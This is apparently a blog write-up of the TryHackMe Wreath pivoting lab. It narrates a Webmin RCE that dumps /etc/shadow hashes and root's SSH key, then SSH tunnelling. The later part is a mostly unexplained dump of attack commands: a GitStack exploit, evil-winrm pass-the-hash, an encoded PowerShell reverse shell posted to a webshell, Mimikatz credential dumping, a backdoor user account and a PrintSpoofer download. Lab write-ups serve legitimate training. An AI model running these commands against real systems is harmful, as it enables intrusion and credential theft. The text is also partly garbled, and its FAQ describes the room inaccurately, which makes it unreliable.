Comprehensive TryHackMe Wreath Network Writeup

TryHackMe Wreath Network Walkthrough helps you learn how to pivot through a network by compromising a public-facing web machine and tunneling your traffic to access other machines in Wreath’s network. (Streak limitation only for non-subscribed users).

Access Wreath Network

Go to https://tryhackme.com/access?type=networks and download your VPN config file.

Access Wreath Network
Access Wreath Network
Wreath Network
Wreath Network
Comprehensive TryHackMe Wreath Network Writeup

TryHackMe Wreath Walkthrough

TryHackMe Wreath Network
TryHackMe Wreath Network

TryHackMe Wreath Network

Comprehensive TryHackMe Wreath Network Writeup
  1. Read the room description and objectives carefully: Before you start the room, take the time to read the room description and objectives carefully. This will give you a good idea of what you need to accomplish and what skills you will need to use.
  2. Take notes: As you work through the room, it can be helpful to take notes on the tools, techniques, and commands that you use. This can help you remember important details and troubleshoot any issues that arise.
  3. Use a web proxy: A web proxy such as Burp Suite can be very helpful for intercepting and modifying web traffic, which can help you identify and exploit vulnerabilities in the Wreath web application.
  4. Look for vulnerabilities: The Wreath web application contains several vulnerabilities that you will need to identify and exploit in order to complete the room. Look for clues in the web page source code, try various input values, and use web application security scanners such as OWASP ZAP to help you find vulnerabilities.
  5. Research: If you’re stuck on a particular step, don’t be afraid to do some research. Try searching for solutions to similar problems or vulnerabilities online, or look for documentation on the tools and techniques that you’re using.

Remember, the most important thing is to approach the room with a willingness to learn and a willingness to try new things. Don’t be discouraged if you encounter obstacles along the way – these are all opportunities to learn and improve your skills!

Let’s Hack!

Before starting let’s create a folder to store all our files.

mkdir /home/kali/TryHackMe_Wreath

Enter the project folder:

cd /home/kali/TryHackMe_Wreath

Attacking Prod-Server

The production server is a Linux host let’s use nmap to scan for open ports and verify what services are running.

Scan the Host

Scan the prod-server using nmap and verify services running on remote machine.

nmap -sC -sV --script=vuln 10.200.193.200
Comprehensive TryHackMe Wreath Network Writeup
Comprehensive TryHackMe Wreath Network Writeup 46

Interesting result the server is running an old WebAdmin version on port 10000.

Comprehensive TryHackMe Wreath Network Writeup
Comprehensive TryHackMe Wreath Network Writeup 47

Open Google and search exploit for Web Admin

search webadmin 1.890

Download Exploit from here:

WebMin-1.890-Exploit-unauthorized-RCE

Exploit WebAdmin 1.890 arguments options:

Comprehensive TryHackMe Wreath Network Writeup

Execute the python script and verify the system process and user.

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "id;whoami"
Comprehensive TryHackMe Wreath Network Writeup

After verifying we are root let’s work to get remote access on the machine, execute the same script but now reading the /etc/passwd file:

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/passwd"
Comprehensive TryHackMe Wreath Network Writeup

Now we have a list of system users we can use, notice the user twreath what is his password hash?

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /etc/shadow"
Comprehensive TryHackMe Wreath Network Writeup

Great we have two user password hashes, let’s crack them.

root:$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1

twreath:$6$0my5n311RD7EiK3J$zVFV3WAPCm/dBxzz0a7uDwbQenLohKiunjlDonkqx1huhjmFYZe0RmCPsHmW3OnWYwf8RWPdXAdbtYpkJCReg

Save both at password_hashes.txt

Crack The Hashes

Passing the hash file into john without more arguments john will auto detect the encryption type.

john passwds_hashes.txt

Verify if john crack any password:

john --show

No success cracking the hashes?

If it was possible to read shadow file maybe it is possible to extract the root SSH RSA private key, let’s try it!

Extract SSH Keys

Root SSH RSA Key

python3 webmin-1.890_exploit.py 10.200.193.200 10000 "cat /root/.ssh/id_rsa"
Comprehensive TryHackMe Wreath Network Writeup
Comprehensive TryHackMe Wreath Network Writeup 48

copy the key content into the file prod-server.rsa and define the correct permissions

chmod 6000 prod-server.rsa
Comprehensive TryHackMe Wreath Network Writeup

Login In into Prod-Server

Now we can log in into our production server, here I will connect through SSH creating a socks5 proxy on port 19850. This proxy will allow us to access all networks and hosts prod-server can access.

ssh -i /home/kali/Wreath/prod-server.rsa [email protected] -D 19850
Comprehensive TryHackMe Wreath Network Writeup
Comprehensive TryHackMe Wreath Network Writeup

We are In as root 😀

Attack Prod-Server Description

We start scanning the host prod-server with nmap and detect a vulnerable version of WebAdmin running on port 10000. Then we search for a public exploit on google and use it to get an RCE on remote server, with the script we were able to extract the root SSH RSA Key and login as root into the prod-server and create a socks5 proxy.

Attacking Git Server

It’s time to attack the git Server but before that let’s configure our proxychains to be able to use any tool against git-server.

If you want to use proxychains strict mode comment the socks4 entry and add only Socks5.

sudo echo "socks5 127.0.0.1 19850" >> /etc/proxychains4.conf
Comprehensive TryHackMe Wreath Network Writeup

An SSH Proxy tunnel can give us a lot of flexibility when we are pivoting inside a network we can keep a secure tunnel between our compromised machines and access any service on the network.

Using SSH and Proxychains
Using SSH and Proxychains

If we want to access git server directly from out browser we need to setup FoxyProxy to use our new socks5 proxy created with SSH tunnel.

Comprehensive TryHackMe Wreath Network Writeup

Now we can access the Git Server directly in our browser.

Remember any tool we use to attack the Git Server we need to use our local Socks5 proxy (127.0.0.1:19850) created with our SSH Tunnel into prod-server host.

After configuring the FoxyProxy to use our proxy open the git server IP on browser.

http://10.200.193.150

We will have an error page but notice have some juice info, it is using Django and mentioned some new directories. Let’s investigate it!

Comprehensive TryHackMe Wreath Network Writeup
http://10.200.193.150/gitstack

Scan Git Server with Nmap

proxychains4 nmap 10.200.193.150 --top-ports 1023 -sT  -n -PS --script=vuln
Comprehensive TryHackMe Wreath Network Writeup

As we know gitstack is running on port 80, let’s search for an exploit using searchsploit tool.

searchsploit gitstack
Comprehensive TryHackMe Wreath Network Writeup

We found 3 possible GitStack exploits, let’s copy the third one into our current folder:

searchsploit -m php/webapps/43777.py
mv 43777.py exploit_GitStack.py
proxychains4 python exploit_GitStack.py
proxychains4 curl -X POST http://10.200.193.150/rest/user/ -d 'username=RFS;password=RFS'
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u RFS -p RFS -i 10.200.193.150
proxychains4 ruby /home/kali/evil-winrm/evil-winrm.rb -u Admnistrator -H 37db63-RFS-a8461e05c-RFS -i 10.200.193.150
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share
firewall-cmd --zone=public --add-port 19850/tcp
firewall-cmd --zone=public --add-port 19851/tcp
scp -i key socat [email protected]:/tmp
./tmp/socat-rfs tcp-l:19851,fork,reuseaddr tcp:10.50.190.121:19851
proxychains4 curl -X POST http://10.200.193.150/web/exploit.php -d 'a=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%2710.200.193.200%27%2C19850%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22'
mkdir /home/kali/TryHackMe_Wreath/share
proxychains4 xfreerdp /v:10.200.193.150 /u:RFS /p:RFS +clipboard /dynamic-resolution /drive:/home/kali/TryHackMe_Wreath/share

Send Mimikatz through file share or SCP

privilege::debug 
token::elevate 
lsadump::sam
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=whoami'
proxychains4 curl -X POST http://10.200.193.150/web/exploit-rfs.php -d 'a=net user RFS RFS /add'

Maintend

Attacking WREATH-PC

http://10.200.193.100
http://10.200.193.100/resources
Username: Thomas
Password - Crack the Hash
powershell.exe -c "(new-object
System.Net.WebClient).DownloadFile('http://10.50.190.121/PrintSpoofer64-rfs.exe','C:\xampp\htdocs\resources\uploads\PrintSpoofer64-rfs.exe')

Linux Privilege Escalation

TryHackMe Wreath Network

URLEncoder

CrackStation

PrintSpoofer64

What is the Wreath room on TryHackMe?

Wreath is a beginner-level room on TryHackMe that focuses on web application security and vulnerability exploitation. The room is designed to help users develop their skills in identifying and exploiting common web application vulnerabilities such as SQL injection, cross-site scripting (XSS), and file inclusion vulnerabilities.

Do I need any prior knowledge or experience to complete the Wreath room?

The Wreath room is designed for beginners, so you don’t need any prior knowledge or experience in web application security or vulnerability exploitation. However, it may be helpful to have a basic understanding of web technologies such as HTML, CSS, and JavaScript, as well as some experience using a Linux command line.

What tools do I need to complete the Wreath room?

You’ll need a web browser, a text editor, and a Linux-based virtual machine such as VirtualBox or VMware. You may also want to use web application security tools such as OWASP ZAP or Burp Suite to help you identify and exploit vulnerabilities in the Wreath web application.

Can I get stuck in the Wreath room?

Yes, it’s possible to get stuck on some of the tasks in the Wreath room, especially if you’re new to web application security and vulnerability exploitation. However, there are many resources available to help you, such as online forums, documentation, and tutorials. You can also reach out to the TryHackMe community for assistance.

Can I work on the Wreath room with others?

Yes, you can work on the Wreath room with others by creating a team or joining an existing team on the TryHackMe platform. This can be a great way to learn from others and share your knowledge and skills.

What should I do after completing the Wreath room?

After completing the Wreath room, you can continue to develop your skills in web application security and vulnerability exploitation by working on other TryHackMe rooms, participating in online forums and communities, and exploring additional resources such as online courses and certifications.

Related Posts

Index